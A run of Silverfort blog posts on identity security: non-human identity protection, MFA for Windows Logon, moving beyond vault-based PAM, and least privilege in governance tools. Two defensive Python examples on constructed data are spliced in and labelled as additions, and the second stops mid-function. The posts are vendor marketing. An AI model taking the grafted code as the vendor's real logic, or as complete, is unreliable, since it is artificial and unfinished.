At Silverfort, we see this problem clearly. With the acquisition of Rezonate, we have built an NHI security solution to tackle the growing complexity of NHIs head-on. The very innovations that earned Rezonate the honor of being named one of “Gartner’s Cool Vendors in Identity-First Security” are now available in Silverfort’s NHI Security product. Today, we are introducing a unified NHI security offering that integrates identity security for both on-prem Active Directory service accounts and cloud NHIs. Silverfort’s NHI Security provides complete visibility, ownership mapping, and enables proactive protection for non-human identities across hybrid environments.
It identifies behavior patterns, enforces access controls for on-premises service accounts to prevent anyone from using them outside of their intended purpose, and delivers actionable insights for cloud NHIs. This is the product the industry needs—one that covers everything from discovery and visibility to proactive protection and risk-driven decision-making. One that addresses NHIs within the broader identity security context and protects both human and non-human identities in a unified manner. No more fragmented, siloed solutions. No more gaps for attackers to exploit.

## What We’re Announcing: Expanding Coverage to Cloud NHIs

Today, we are expanding our platform to provide comprehensive coverage for cloud-based NHIs across all major cloud identity providers, cloud infrastructure providers, and SaaS applications. For years, Silverfort has been the leader in securing on-prem Microsoft Active Directory (AD) service accounts, providing unparalleled visibility and protection to many of the world’s leading enterprises. Now, we bring that same level of depth to cloud NHIs, connecting the dots between human identities and their non-human counterparts, giving organizations the comprehensive visibility needed to make informed, proactive security decisions.

## Addressing the Challenges: Why Silverfort’s Solution Is the Future of NHI Security

- Unified coverage for both on-prem and cloud NHIs: Most vendors treat on-prem and cloud NHIs as separate problems. We don’t. Our platform integrates both, providing a unified security posture that extends from cloud to ground. No more silos, no more fragmentation. Whether it’s a service account on AD or an API key in AWS, we take care of their security seamlessly.
- Complete discovery and ownership mapping: We understand the critical need for visibility into both NHIs and their owners. Traditional tools leave ownership tracking to guesswork, making it impossible to secure these identities effectively.
At Silverfort, we map every identity—human and non-human—to its owner, providing the visibility needed to protect them. You cannot separate NHIs from human identities—they are created, maintained, and operated by people, and their actions directly affect human-managed systems and vice versa.

- Real-time protection of service accounts: We go far deeper in visibility and protection than any other vendor when it comes to the on-prem AD service accounts. Real-time enforcement of virtual fencing blocks any use of the account outside of its intended purpose, making lateral movement impossible. Our Smart Policy capability simplifies enforcement at scale across large, complex environments with a single click.
- Seamless integration across platforms: Our platform is built to integrate with existing infrastructures, whether on-prem or in the cloud. From AD to Entra ID, from AWS to Azure, from GitHub to Snowflake, we provide cross-platform protection that spans hybrid environments, ensuring that no identity is left unprotected.

## The Future of Identity Security: Transformation and Innovation

At Silverfort, we’re not just responding to the latest trends; we’re shaping the future of identity security. We’re building an end-to-end platform that protects every type of identity, no matter where they originate or if they are human or not, offering unparalleled visibility, analysis and control across your entire ecosystem. As identity becomes the focal point in the security stack, our platform will continuously evolve to meet the demands of the market. We will continue to innovate, bringing new capabilities like behavioral monitoring, threat modeling, and event filtering to ensure that identities—whether human or machine—remain protected. In a world where identity is the new perimeter, machine and human identities are inseparable. Silverfort is leading the way in securing this interconnected reality—making sure every identity in your ecosystem is visible, understood, and protected.

Join us in reshaping the future of identity security. Learn more about Silverfort’s NHI security product here.

---

- Published: 2025-04-24
- Modified: 2025-06-05
- URL: https://www.silverfort.com/blog/enforcing-mfa-for-windows-logon-local-endpoints-virtual-desktops-and-servers/

Do you know how many Windows Logon authentications happen on a daily basis? Hundreds of thousands of employees globally use it to access their laptops, desktops, and virtual environments to perform work operations every single day. However, despite widespread adoption of Multi-Factor Authentication (MFA) for cloud applications, this critical layer often remains unprotected.
Although this security challenge is well known, the real reason it persists is how difficult it is to enforce MFA across different types of environments. Native solutions, like Windows Hello for Business, can require additional infrastructure, while many virtual desktop platforms often lack any built-in MFA support. In OT and remote locations, enforcing MFA can be even more challenging due to limited connectivity or the inability to use mobile devices.

In this blog, we’ll explore why enforcing MFA for Windows Logon is so challenging and how the Silverfort for Windows Logon solution helps overcome these gaps.

## Before any work begins: The first step is Windows Logon

We typically see two primary types of Windows Logon in organizations: local Windows Logon and Virtual Desktop Logon.

### Local Windows Logon

This is the process of signing in directly to an individual Windows machine using either a local or domain-based account. It’s commonly used on individual devices, work laptops, shared terminals in retail or healthcare industries, and computers in OT environments. These machines often operate outside the visibility of centralized identity systems, including Active Directory (AD) or modern IdPs. As a result, MFA enforcement is highly inconsistent, especially for local accounts that aren’t connected to any domain, exposing these machines to credential compromise.

### Virtual Desktop Logon

In this process, users authenticate into virtual environments like Azure Virtual Desktop, Citrix, or Remote Desktop Protocol (RDP) sessions. While these environments are managed centrally, the initial logon process still relies on the Windows authentication layer before any MFA takes place. Many virtual desktop infrastructures don’t support native MFA at this stage, creating a security gap that attackers can exploit during remote access. Without MFA enforcement, organizations leave critical data and applications exposed to attackers connecting from unmanaged or external devices.
## Why enforcing MFA for Windows Logon isn’t so simple

Enforcing MFA across Windows Logon may seem straightforward, but in practice it isn’t just a technical checkbox for security teams. While SaaS applications, cloud workloads and VPNs can be protected with centralized identity providers (IdPs), Windows Logon is often left behind—unmonitored and unprotected. Unlike cloud applications that rely on centralized SSO platforms, Windows Logon authentication occurs at the endpoint level, where MFA enforcement and visibility depend on the underlying infrastructure. In many cases, especially with local or offline machines, this makes it difficult for security teams to apply consistent policies or track authentication activity.

It introduces a different set of challenges based on additional infrastructure requirements, lack of native support for virtual environments, and the reality of offline user scenarios. With these risks in mind, attackers often look for Windows Logon authentications in the environment as a place to compromise credentials, move laterally and then escalate privileges.

Let’s take a closer look at why protecting Windows Logon with MFA is harder than it seems.

### Additional infrastructure requirements: a barrier for deployment

Protecting Windows Logon with MFA often requires the deployment of additional infrastructure, including certificate-based authentication, public key infrastructure (PKI), or biometric device enrollment. These components increase the complexity of setup and limit the ability to scale MFA across diverse environments. For organizations with a limited workforce or no existing certificate infrastructure, this becomes the bottleneck that either delays or completely prevents any MFA enforcement. As a result, a critical authentication layer is left exposed because the cost and effort of deployment are too high.
### Lack of native support in virtual environments: a security gap for remote access

In virtual desktop environments MFA enforcement is often missing at the initial identity layer. These platforms may support MFA at later stages, such as application access or session initiation, and this creates a blind spot where users can authenticate to the desktop without any additional verification. For attackers, this is a critical gap in remote access scenarios, allowing credential-based compromise or lateral movement without any MFA trigger.

### Offline and OT environments: no connectivity, no MFA

In many organizations, Windows machines operate in environments where network connectivity is limited or restricted. These include OT systems in factories, industrial control rooms, warehouses, and remote field sites. Within these environments, employees cannot use any traditional MFA methods, including push notifications. As a result, Windows Logon authentications remain completely unprotected and unobserved, leaving critical resources open to compromise.

These challenges leave the Windows Logon layer exposed, making it a prime target for identity-based attacks. That’s why, for many organizations, enforcing MFA at this layer is no longer optional. Cyber insurance policies and compliance frameworks, like CJIS, now require secure authentication at the machine level to protect sensitive data.

## How Silverfort extends MFA for Windows Logon

Silverfort allows organizations to enforce MFA across all types of Windows Logon scenarios without requiring additional infrastructure deployed in the environment. By integrating directly at the authentication protocol level, Silverfort applies MFA in real time to both domain-based and local authentications, whether on a physical device, a virtual machine or an offline system.

Let’s explore how Silverfort helps organizations address different use cases of Windows Logon authentication.
### Enforcing MFA for Local Windows Endpoints

Silverfort for Windows Logon (S4WL) provides access control and real-time risk analysis for all Windows endpoints, allowing users to authenticate to a local AD domain or Microsoft Entra ID. When a user attempts to log in, Silverfort evaluates the request through its policy engine and can trigger a push notification via Entra ID, ensuring the user’s identity is verified before access is granted.

Video: Example of Windows Logon authentication on the local endpoint with Silverfort triggering a push notification via Entra ID.

### Protecting Virtual Desktop Logon

Silverfort secures RDP sessions by enforcing MFA directly at the Windows Logon layer. In this configuration, when a user initiates an RDP connection, they are prompted to enter a one-time passcode (OTP), which provides an additional layer of identity verification before granting access to remote machines or servers.

Video: Example of RDP session protection at the Windows Logon layer with Silverfort triggering an OTP.

### Securing offline and OT environments

In environments where internet connectivity is limited or unavailable, such as OT systems in factories or field sites, Silverfort supports offline Windows Logon by evaluating authentication attempts locally and prompting users to authenticate with a FIDO2 hardware token or a TOTP code.

Video: Example of the offline Windows Logon authentication process with Silverfort prompting for a FIDO2 hardware token.

## Preventing identity-based attacks from the first login

Windows Logon is one of the most common first access points used across any organization. Without protection at this critical layer, attackers can easily exploit credentials to move laterally and escalate privileges undetected. Silverfort helps close this blind spot by enforcing strong MFA controls on the login authentication process.
With end-to-end visibility into every authentication attempt and policy-based access control, Silverfort can finally help security teams prevent identity-based attacks.

Looking to secure your Windows Logon authentications? Schedule a call with one of our experts to see how Silverfort can help you secure your environment.

---

- Published: 2025-04-16
- Modified: 2025-04-16
- URL: https://www.silverfort.com/blog/the-inevitable-decline-of-traditional-pam/

Traditional PAM solutions have dominated the market for years—but the truth is, you probably don’t need one to cover the most common privileged access use cases in your environment. PAM solutions tend to be complex, time-consuming to implement, and difficult to enforce. Their workflow changes for users like IT admins and developers often lead to frustration—and creative ways to bypass them. This leaves your critical users open to compromise until your PAM project is fully deployed. Even traditional PAM vendors are waking up to this reality and are thinking about shifting away from their vault-centric solutions to a more dynamic and modern approach to securing privileged users. Why? The old approach of vaulting every user simply isn’t needed anymore. It’s time to be more proactive about security and embrace approaches and solutions designed for today's threats.

In this blog, we'll explain why organizations are abandoning traditional PAM offerings in favor of a more modern approach to identity security.

## Why traditional PAM is falling out of favor

For years, PAM solutions excelled at correlating multiple users into a single generic or shared account while enforcing session recording through a session proxy. This approach made sense in an era where the built-in admin account was the default for managing assets. But things have changed. With today’s hybrid environments and evolving threat landscape, traditional PAM best practices are not up to par with modern security demands.
This is due to:

- Compatibility issues with AD tiering: Accessing a privileged tier via PAM from a less privileged endpoint breaks the AD tiering model. PAM proxy access, which fetches credentials from a vault without reaching the endpoint, offers a secure, tier-compliant alternative, but it impairs the effectiveness of traditional PAM solutions. A dedicated PAM deployment for each tier in the tiering model, accessed from a Privileged Access Workstation (PAW) for that tier, is the only compliant method, but it adds very little value, since it is really only needed for session recording or for tracking access to shared accounts. That makes it an unappealing proposition given the extra infrastructure and management overhead.
- Ineffectiveness of session recording: While session recording may seem like an effective auditing solution, it is mostly overkill for the PAM admins who use this capability. With proper logging configured on the resource being managed, session recording becomes unnecessary. Furthermore, most organizations don't have the dedicated time and resources to review these recordings, reducing their value to the occasional post-breach analysis during incident investigations.
- Limited coverage: PAM solutions focus on securing known privileged users but fail to address unmonitored accounts, leaving organizations exposed to blind spots. Discovery capabilities often rely on naming conventions and group memberships, but they cannot detect bypass accounts deliberately designed to remain hidden and used by IT admins to evade PAM controls. Additionally, desktop users (tier 2), who frequently log in directly with passwords, face the highest risk of compromise and cannot be adequately protected by a password vaulting approach.
- Unmanaged NHI access: Many privileged machine accounts operate without direct interaction through session proxies, leaving PAM unable to enforce real-time visibility and security controls on these accounts.
Instead, it relies on password rotation via APIs and limited activity log analysis. This lack of proper discovery means organizations cannot fully understand where an NHI is being used, while credential rotation risks disrupting systems. As a result, many organizations avoid managing NHIs through their PAM, further exposing these accounts as a security blind spot.

- Personal admin account oversight: Auditors and regulatory standards recommend using personal admin accounts for clear accountability, correlating recorded actions with individual users. While PAM solutions can track the use of shared admin accounts and link them to specific users, personal accounts provide greater security because access remains limited to fewer individuals. Additionally, shared accounts can be problematic when employees leave, often leaving gaps in access revocation. PAM struggles to manage personal accounts under the vault model.

Traditional PAM practices are outdated and incompatible with the complexities of modern security environments. Faced with the challenges and security blind spots discussed above, organizations are now actively moving beyond traditional PAM in favor of a more effective approach tailored to today's security demands, with far greater efficiency.

### The modern approach to securing privileged users

Traditional PAM was designed with a straightforward approach: secure privileged credentials in a vault, log their use, and rely on the assumption that attackers would be deterred. This strategy was effective in an era of static environments and centralized on-prem infrastructure, when privileged users were limited to a small group of IT admins. But today’s identity landscape is dynamic, distributed, and cloud-native. Privilege is everywhere—across thousands of identities, machines, and services—and it no longer fits in a vault.
Instead, we need a modern approach to PAM that moves beyond vaults and focuses on identity, access, and context in real time. It should be designed to provide continuous visibility into who (or what) has privileged access at any given moment, detect when that privilege is being used, and enforce security controls dynamically—regardless of where the access happens, what credentials are used (if any), or what platform it's on.

### Visibility: Mapping the true attack surface

Visibility lies at the heart of securing privileged access. Effective privileged access management requires a continuously updated, comprehensive view of all identities—human and non-human—that possess or can escalate to elevated privileges. This includes not only traditional admin accounts but also delegated access through group memberships, inherited IAM roles, cloud-native permissions, and service accounts embedded in automation pipelines or scripts.

The reality of today's threat landscape is stark: attackers no longer need to breach the vault if they can exploit a cloud workload identity with admin-level API privileges. As a result, mapping and managing the complete privilege attack surface is essential for proactive security and risk reduction.

### Real-time enforcement across all access paths

Unlike traditional PAM, which responds only after the fact, this new approach to privileged access should be built on real-time security controls. By integrating directly with authentication protocols—such as Kerberos, NTLM, LDAP, SAML, and more—it should detect privilege escalation instantly and enforce controls proactively, before any session starts.

This proactive approach can trigger MFA, block risky access requests based on contextual signals, or dynamically enforce session boundaries to restrict misuse. Instead of relying on session logs for post-incident reviews, it disrupts threats at the point of access, ensuring misuse is prevented rather than simply documented.
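As an added illustration of the real-time, context-aware enforcement described above (example code written for this page, not Silverfort's product logic), the following Python policy engine evaluates constructed authentication events before a session starts: it resolves privilege through nested group membership, blocks privileged accounts over NTLM or from non-PAW sources, requires MFA for privileged access from a PAW, and holds service accounts to a learned source/destination baseline. All directory data, PAW names and baselines are constructed assumptions.

```python
"""Added example: a minimal real-time access policy for privileged identities.
Constructed data only; not Silverfort's product logic."""
from dataclasses import dataclass

# Constructed directory: group -> members (user names or nested group names).
GROUPS = {
    "Domain Admins": {"alice", "Tier0-Operators"},
    "Tier0-Operators": {"bob"},
    "Helpdesk": {"carol"},
}
PRIVILEGED_GROUPS = {"Domain Admins"}

# Constructed allow-list of Privileged Access Workstation host names.
PAWS = {"paw-01", "paw-02"}

# Constructed baseline of where each service account is known to authenticate
# from and to (the "source and destination" restriction for service accounts).
SERVICE_BASELINE = {
    "svc-backup": {"sources": {"bkp-srv-01"},
                   "destinations": {"file-srv-01", "file-srv-02"}},
}


@dataclass(frozen=True)
class AuthEvent:
    user: str
    protocol: str      # e.g. "Kerberos", "NTLM", "LDAP"
    source: str        # host the authentication originates from
    destination: str   # host or service being accessed


def effective_groups(user, groups=GROUPS):
    """All groups the user belongs to, following nested membership so that
    privilege delegated through group chains is not missed."""
    resolved = set()
    pending = [g for g, members in groups.items() if user in members]
    while pending:
        group = pending.pop()
        if group in resolved:
            continue
        resolved.add(group)
        # Any group that contains this group as a member is inherited too.
        pending.extend(parent for parent, members in groups.items()
                       if group in members)
    return resolved


def is_privileged(user):
    return bool(effective_groups(user) & PRIVILEGED_GROUPS)


def decide(event):
    """Inline verdict for one authentication: ("allow" | "mfa" | "block", reason).
    Evaluated before the session is established, not from logs afterwards."""
    baseline = SERVICE_BASELINE.get(event.user)
    if baseline is not None:
        # Service accounts cannot answer an MFA prompt, so deviation from the
        # learned source/destination pair is blocked outright.
        if (event.source not in baseline["sources"]
                or event.destination not in baseline["destinations"]):
            return "block", "service account outside learned source/destination baseline"
        return "allow", "service account within baseline"
    if is_privileged(event.user):
        if event.protocol == "NTLM":
            return "block", "privileged account authenticating over NTLM"
        if event.source not in PAWS:
            return "block", "privileged access not originating from a PAW"
        return "mfa", "privileged access from a PAW requires step-up"
    return "allow", "non-privileged user"


if __name__ == "__main__":
    # Constructed sample events.
    for ev in (AuthEvent("bob", "Kerberos", "paw-01", "dc-01"),
               AuthEvent("alice", "NTLM", "paw-01", "dc-01"),
               AuthEvent("alice", "Kerberos", "laptop-77", "dc-01"),
               AuthEvent("svc-backup", "Kerberos", "ws-42", "file-srv-01"),
               AuthEvent("carol", "NTLM", "ws-42", "print-srv")):
        print(ev.user, ev.protocol, ev.source, "->", ev.destination, decide(ev))
```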
### Enforcing the Least Privilege model

Continuous enforcement of least privilege is an essential component of this new approach. Instead of relying on static role assignments in the hope that they won't be compromised, a modern PAM solution should continuously analyze behavior, usage trends, and entitlements to identify and eliminate excessive privileges.

Leveraging role-based and attribute-based access controls, permissions are precisely tailored and minimized—even for service accounts and other machine accounts. When anomalies arise, they are detected and addressed in real time, with security controls enforced and risk mitigation measures promptly implemented.

### Just-in-Time access: Kill standing privilege

To truly minimize risk, this approach should enforce Just-in-Time (JIT) access. Instead of being granted standing privileges, users elevate access only when needed, through time-bound approvals or automated workflows.

Once the task is done, the privilege is revoked automatically. This minimizes the window of opportunity for attackers and limits the blast radius if an account is compromised. JIT access ensures privileges are temporary and traceable, reducing the scope for lateral movement.

### Going beyond the vault

This new and modern approach to securing privileged access is not about where credentials are stored—it's about how privilege is discovered, monitored, and controlled across your entire ecosystem. It’s a fundamental shift away from the outdated practice of vaulting all users, which makes the deployment of security controls complex and lengthy and fails to address modern security challenges.

Instead, the focus is on dynamic, real-time management of privileged access, enabling tailored access controls without the need to vault every user.
It is a significant step forward: from a purely preventive approach to proactive, real-time security enforcement built to navigate the complexity of current identity infrastructures and counter today's attack landscape. Even traditional PAM solutions are evolving to adopt these practices, better aligning with organizational needs in a fast-changing security landscape.

To learn how Silverfort’s Privileged Access Security (PAS) can help you change the way you secure privileged access, download our securing privileged access eBook or contact one of our experts today.

---

- Published: 2025-04-07
- Modified: 2025-04-07
- URL: https://www.silverfort.com/blog/reflections-from-the-identity-frontline/

Over the last eight years, I’ve had the unique challenge of building and maturing an Identity and Access Management (IAM) program from the ground up for a large multinational retailer with an extremely complex hybrid environment. On day one, it was just me, a laptop, and a myriad of challenges. The scale was staggering—thousands of business applications, tens of thousands of servers, nearly half a million employees worldwide, and a vast attack surface to secure with limited resources. Despite our best efforts, we constantly discovered new security risks, underscoring the dynamic nature of identity security.

### Building a strong IAM foundation

Freedom from heavy regulation allowed me and my team to design an IAM program tailored to our unique security needs. We set about building the foundations of a successful IAM program: strong, highly automated access management for millions of accounts and their access privileges, rooted in a comprehensive inventory of identities. We implemented single sign-on (SSO) protected with multi-factor authentication (MFA) for hundreds of applications and developed technology for secure password reset, deeply tied to HR processes.

Despite these efforts, we were never fully comfortable.
It seemed that behind every door we opened, we found new risks. Identity security felt like an endless cycle of plugging gaps while new ones appeared. Given the complexity of modern IT environments, even the most seemingly innocent account could become an entry point for attackers.

Through this experience, I developed a guiding principle: security is a game of space and time. The goal is not to implement security gradually, but to make strategic investments in solutions that mitigate multiple risks at once, allowing security teams to stay ahead of threats without being buried in complexity.

### Creating space and time

Traditional security improvements often involve small steps that each take a significant amount of time and resources while addressing only a small portion of the problem; for example, the use of SSO or the implementation of Identity Governance and Administration (IGA) for business applications. No single initiative can reduce identity risk to an acceptable level. In each case, they are applied incrementally without achieving any wider benefit, and all of them require a great deal of time and resources to implement.

My challenge was to find the right investments to prevent my team from having to work through complex, deeply technical, incremental work in plain sight while running with unacceptable levels of identity risk. We needed to shift the focus from individual use cases and incremental fixes to investments that solve specific problems while also providing a broad scope of protection and scalability—in other words, investments that create space and time for our teams. The question is: how do we secure identity quickly without getting lost in complexity?

To answer this, I believe you need to take a three-part approach to achieve complete identity security protection across your organization.
### A game of ceilings and floors: Raising the baseline of security

As an avid sports fan, I often draw parallels between identity security and team sports. In sports, a team’s success is rarely determined by its best players; instead, it hinges on the performance of its weakest link. The ‘ceiling’ of a player represents their maximum potential performance, while the ‘floor’ is their worst performance level.

Identity security follows the same principle: organizations must first raise their security floor before aiming for their ceiling. So, instead of focusing solely on high-end protections for select systems, the priority should be building broad, foundational security that addresses common attack vectors and security risks.

In practice, this means implementing strong security controls and ensuring up-to-date IAM best practices are followed by all user accounts and resources within the organization. By establishing this baseline, organizations create a resilient foundation that mitigates the most significant threats and reduces overall risk.

It’s only after this baseline of protection has been established that security leaders can focus on elevating the ceiling with more advanced protections. As a result, high-leverage security investments that address multiple risks simultaneously can provide a multiplier effect on ROI.

By prioritizing broad, foundational security and leveraging investments that offer multiple benefits, organizations can create a comprehensive and scalable security strategy. This approach ensures that no account, no matter how “insignificant”, is left vulnerable to compromise, and that the entire organization is better protected against evolving threats.

### Using leverage to your advantage

Not all security investments deliver the same value. Some controls solve isolated problems, while others create leverage by mitigating adjacent risks. High-leverage investments provide a multiplied return, reducing the urgency of solving related risks.
In my experience, protecting all server authentication with MFA or usage restrictions (e.g., limiting service accounts according to source and destination) mitigates a host of password-related and access management risks. Poor-quality passwords, uncertainty about where your passwords are stored or written down, lack of rotation for non-human identities, and concerns about overprivileged accounts—all of these become less urgent problems to solve if you have proper authentication protection in place.

On the flip side, preventing passwords from being stored insecurely is an incremental, difficult problem that cannot be solved with leverage. A password may be found in a file on a computer, in a cloud storage account, in a file share, etc. Solving this problem alone requires considerable effort and does not mitigate other, equally pressing risks. Even if a password is stored securely, it is still at risk if it is low quality.

Finding investments with leverage reduces the urgency of the technical risks they mitigate; they buy space and time for your team to build your security ceiling.

### Broad protection matters

There is a well-known story from a red team exercise that illustrates a crucial point: to breach a high-security data center, an ethical hacker found a robust, access-controlled door. Instead of attempting to bypass it, they ran through the plasterboard wall next to it.

This story made me think about how attackers are like water; they will always find the lowest level. The adversary will simply pivot to lower-hanging fruit if an organization restricts its security efforts to a limited number of systems or accounts. Most cyber-attacks are financially motivated and opportunistic; they are not personal.

Considering how complex and connected our systems are today, we cannot assume that any account, no matter how innocent-looking, is safe or too low priority for protection. The key to scalability is to assess investments for their ease of scaling.
Platforms that enable an easily manageable control plane are more scalable than incremental, decentralized controls. Strong security controls that cannot be implemented at scale create a weak foundation. To achieve scalability, a comprehensive approach is necessary to close these gaps efficiently.

### A balanced approach to identity security

Identity security leaders have complex and demanding roles. Building a broad security floor while prioritizing investments that buy your team space and time can help. Balancing this way of thinking with compliance requirements, which by their very nature encourage selectively building high security ceilings, will go even further to protect your environment. In fact, I believe this balancing act is the only effective method of reducing risk in today's environments. It is important to prioritize investments that provide leverage, broad coverage, and centralized control to reduce risk at scale. Keeping these principles in mind will allow organizations to secure identity efficiently and stay ahead of evolving threats without drowning in complexity.

For security leaders, the challenge is clear: build a strong foundation, invest in scalable security solutions, and ensure your security efforts buy the time and space needed to stay ahead of the identity threat landscape.

---

- Published: 2025-03-27
- Modified: 2025-03-31
- URL: https://www.silverfort.com/blog/its-the-identity-stupid-a-conversation-with-identity-security-expert-abbas-kudrati/

I sat down with Abbas Kudrati, APAC Chief Identity Security Advisor at Silverfort, to discuss the most pressing identity security trends shaping 2025 and what C-suite leaders need to know to protect their organizations.

Your new lecture title "It's the identity, stupid" grabs attention immediately. What inspired this?

Abbas: Well, I borrowed from James Carville's famous 1992 Clinton campaign message, but with a cybersecurity twist.
The reality is that in today's world, identity isn't just one component of security; it's the fundamental pillar. Your firewall isn't your first line of defense anymore; your identity infrastructure is. Organizations that haven't grasped this are fighting today’s battles with yesterday’s weapons.

What has changed in the security landscape that has made identity so central?

Everything has been turned inside out. The internet is the new network, the cloud is the new data center, and identity is the new perimeter. Any device can be a work device now, and effectively, every company has become an IAM company whether they realize it or not. What's particularly concerning is that non-human identities now outnumber human identities by 25-50 times. In 2010, humans dominated the identity landscape. By 2020, non-human identities were 10x more numerous, and by 2025, with GenAI, LLMs, and copilots, they're projected to be 50x more numerous. That's a massive attack surface that most organizations aren't securing properly.

Your research highlights significant concerns about non-human identities. Why should executives care about this specifically?

Because it's a ticking time bomb. According to Cloud Security Alliance research, only 15% of organizations feel highly confident in preventing NHI attacks, while 69% are concerned about them. Only 20% have formal processes for offboarding and revoking API keys, and even fewer rotate them regularly.

The most alarming part? Service accounts, which often hold extensive privileges, frequently lack robust visibility. If these machine identities are compromised through configuration files or code repositories, it can lead to extensive business disruption.

As organizations harden user policies, attackers are increasingly targeting applications instead. The problem? Applications can't use MFA or remember credentials like humans can, and developers often want all the privileges they can get. It's a perfect storm.
Gartner recently named managing machine identities as one of the top cybersecurity trends for 2025. What's driving this focus?

Reality is catching up with the threat landscape. The OWASP Top 10 Non-Human Identity Risks for 2025 highlights critical issues like improper offboarding, secret leakage, vulnerable third-party NHIs, and overprivileged NHIs.

As more companies adopt Zero Trust principles, attackers are evolving their strategies. Rather than trying to circumvent identity infrastructure, they're working to subvert it. This requires breaking down the traditional walls between identity and security teams, something many organizations still struggle with.

Let's discuss AI's role in identity security. How is it changing the landscape?

It's a double-edged sword. Forward-thinking organizations are leveraging AI to transform identity operations, from discovering hidden entitlements to predicting risks and optimizing access policies. This represents a fundamental shift from reactive to predictive security.

But AI is also empowering attackers. We're seeing increasingly sophisticated automation of identity-based attacks, particularly in permission mining and lateral movement. After gaining initial access, threat actors can now systematically explore and exploit identity permissions, especially in cloud environments, often finding subtle paths to higher privileges that might not trigger alerts.

What are the most significant identity-based threats in 2025?

I categorize them into three main threats:

First, "Ungovernable Users". The reality is that users can't be trained to deal with sophisticated attacks like session-cookie theft, adversary-in-the-middle phishing, or MFA fatigue. The high frequency of user failures overwhelms SOC resources. Organizations need to make security flows failure-proof.

Second, "Ungoverned Applications". As organizations harden user policies and infrastructure, attackers shift to applications.
The strategy here needs to be strict application controls, compliance checks, and credential scanning in real time.

Third, "Subverted Infrastructure". As Zero Trust adoption increases, attackers are working to subvert rather than circumvent identity infrastructure, exploiting trust relationships between identity providers and service providers.

You've developed a strategic matrix for identity security investments. Can you explain how executives should approach this prioritization?

The Identity Security Matrix helps executives allocate resources across four strategic priorities. Zero Trust Architecture and AI Integration offer the highest strategic value, though they differ in implementation complexity. Zero Trust Architecture provides high strategic value with relatively low implementation challenges, while AI Integration is just as important but requires more complex implementation.

Industry Consolidation, while complex to navigate, carries lower strategic weight for most organizations. Workforce Challenges require ongoing attention but shouldn't divert resources from more critical initiatives.

What practical steps should C-suite leaders take to strengthen their identity security posture?

Six critical actions:

First, implement strategic access controls, especially Just-In-Time access for sensitive operations.

Second, tighten authentication requirements with robust MFA for both internal access and service-to-service authentication.

Third, strengthen identity security testing to include scenarios like permission chain exploitation and SSO trust relationship vulnerabilities.

Fourth, advance identity governance with regular permission reviews to limit breach impact.

Fifth, transform security operations with identity as the cornerstone, implementing real-time verification.

Finally, establish machine identity governance with dedicated oversight committees for these critical business assets.
For organizations still early on in their identity security journey, what's the one thing they should focus on first?

Start by understanding your identity landscape, particularly your non-human identities. You can't secure what you can’t see—or don’t even know about. Most organizations have hundreds or thousands of service accounts, API keys, and machine identities operating with excessive privileges and insufficient oversight. A comprehensive identity inventory, especially of non-human identities, is the foundation everything else builds upon.

What is one key piece of advice for security business leaders that you would share with our readers?

Identity security needs to evolve from a technical initiative to a business-critical priority. The C-suite must drive this transformation through strategic investment and attention. Companies that recognize "it's the identity, stupid" and act accordingly will be far more resilient against the sophisticated threats of 2025 and beyond.

Want to learn more about protecting your organization's identity infrastructure? Visit Silverfort's Platform page to explore our Identity Security platform, or take a product tour.

---

- Published: 2025-03-20
- Modified: 2025-03-20
- URL: https://www.silverfort.com/blog/who-governs-the-governance-why-the-least-privilege-model-is-key-to-securing-iga/

IGA tools allow organizations to manage who has access to what. IGA's primary focus is on business outcomes and operational efficiency—priorities that may not always align with security needs. In the pursuit of maximizing efficiency, it's easy to miss potential attack vectors.

Employees often switch roles and keep access to resources they no longer need, or leave their jobs entirely while their accounts remain active. That's not only inefficient and redundant—it also gives attackers a way in.
In this blog, we'll discuss what it means to secure IGA and ensure governance processes do not introduce security risks such as excessive, outdated or misused privileges. We'll then dive into why the principle of least privilege is crucial to preventing them, and who should be involved in the process (spoiler alert: it's the security team).

### The risks of excessive access

#### Overstaying your welcome: Permissions that stick around come back around

Sometimes we accumulate things we don't really need, and luckily for attackers, user permissions are one of those things. In the long run, excessive and unused permissions can significantly expand an organization’s identity attack surface without anyone even knowing it—until something goes wrong. IGA assigns access but doesn’t always revoke it. The first thing to do is find out what is actually being used rather than assuming users need all the privileges they were given. If a permission has not been used in months, does it really need to exist?

#### Forget about it: Stale users are still users

Employees leave, contracts end, people move on to their next adventure. It's all part of corporate life. Their accounts, however, should leave and never return. Similarly, when people change roles or move to other departments, their old permissions remain intact until someone actively removes them, which often takes a while. After all, what's the harm? They’re still part of the company. These stale users and their permissions are easily forgotten—and even easier to exploit in the wrong hands.

#### Truth be told: Compliance alone does not guarantee security

Periodic access reviews are a compliance requirement, but compliance doesn’t always equal security. Security risks change constantly, and keeping track of what permissions have been granted and how they are actually being used in real time is crucial to blocking malicious access attempts and attacks before they can do damage.
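To make the two risks above concrete (permissions unused for months, and accounts whose owners have left or changed roles), here is an added Python example, not part of the original post or of any IGA product, that reviews a constructed IGA entitlement export against an HR feed and an access log and lists what should be revoked or re-certified. The 90-day grace period, the data layout and all names are assumptions made for the example.

```python
"""Added example: continuous entitlement review over constructed data.
Finds (1) entitlements not exercised within a grace period, (2) entitlements
whose owner is no longer active or has moved to another department, and
(3) use of an entitlement after its owner's departure. Not vendor code."""
from collections import defaultdict
from datetime import date, timedelta

GRACE_PERIOD = timedelta(days=90)   # assumption: unused for 90 days = unused

# Constructed HR feed: status, current department, departure date if any.
HR = {
    "alice": {"status": "active", "department": "finance", "left_on": None},
    "bob":   {"status": "active", "department": "engineering", "left_on": None},  # moved from finance
    "carol": {"status": "terminated", "department": "sales", "left_on": date(2025, 1, 31)},
}

# Constructed IGA export: (user, entitlement, department it was granted for, grant date).
ENTITLEMENTS = [
    ("alice", "erp-finance-readwrite", "finance", date(2024, 1, 10)),
    ("bob", "erp-finance-readwrite", "finance", date(2023, 6, 1)),
    ("bob", "git-engineering-push", "engineering", date(2024, 9, 1)),
    ("carol", "crm-admin", "sales", date(2022, 3, 15)),
    ("alice", "hr-export", "finance", date(2024, 11, 1)),   # granted, never used
]

# Constructed access log: (date of use, user, entitlement exercised).
ACCESS_LOG = [
    (date(2025, 3, 1), "alice", "erp-finance-readwrite"),
    (date(2025, 3, 5), "bob", "git-engineering-push"),
    (date(2024, 2, 1), "bob", "erp-finance-readwrite"),
    (date(2025, 2, 20), "carol", "crm-admin"),   # after carol's departure
]


def last_use_by_entitlement(log):
    """Map (user, entitlement) -> most recent date it was exercised."""
    last = {}
    for when, user, ent in log:
        key = (user, ent)
        if key not in last or when > last[key]:
            last[key] = when
    return last


def review_entitlements(today, hr=HR, entitlements=ENTITLEMENTS,
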